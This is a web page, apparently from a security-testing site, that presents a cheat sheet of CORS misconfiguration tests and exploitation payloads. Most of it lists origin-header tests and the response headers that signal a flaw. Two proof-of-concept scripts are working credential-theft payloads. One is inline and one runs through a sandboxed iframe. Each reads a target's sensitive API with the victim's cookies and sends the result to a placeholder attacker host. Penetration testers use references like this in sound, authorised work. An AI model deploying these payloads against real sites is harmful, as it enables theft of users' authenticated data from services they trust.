CORS Misconfiguration Cheat Sheet

CORS misconfiguration exploitation payloads for origin reflection, null origin, and wildcard subdomain attacks. (13 payloads)

Origin Reflection Tests

(5)

Origin: https://evil.com → check if Access-Control-Allow-Origin echoes it

Reflected origin test

Origin: null → check if null origin is allowed

Null origin test

Origin: https://trusted.com.evil.com → subdomain suffix match

Subdomain suffix confusion

Origin: https://eviltrusted.com → prefix match

Domain prefix confusion

Check if Access-Control-Allow-Credentials: true with reflected origin

Credentials + reflected origin = critical

Exploitation PoCs

(3)

<script>fetch("https://TARGET/api/sensitive",{credentials:"include"}).then(r=>r.text()).then(d=>fetch("https://ATTACKER/log?d="+btoa(d)))</script>

Steal data via reflected origin

<iframe sandbox="allow-scripts" srcdoc="<script>fetch('https://TARGET/api/sensitive',{credentials:'include'}).then(r=>r.text()).then(d=>fetch('https://ATTACKER/log?d='+btoa(d)))</script>"></iframe>

Null origin exploit via sandboxed iframe

Host PoC on subdomain of trusted domain if wildcard CORS configured

Subdomain takeover → CORS exploit chain

Detection Headers

(5)

Access-Control-Allow-Origin: *

Wildcard — no credential theft possible

Access-Control-Allow-Origin: * + Allow-Credentials: true

Invalid but some servers misconfigure

Access-Control-Allow-Origin: <reflected> + Allow-Credentials: true

CRITICAL — full credential theft

Access-Control-Allow-Origin: null + Allow-Credentials: true

Null origin with credentials — exploitable

No ACAO header → not vulnerable to CORS attacks

Safe — no CORS misconfiguration

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

CORS Misconfiguration CSRF

Related Cheat Sheets

XSS Cheat Sheet CSRF Cheat Sheet

$loading...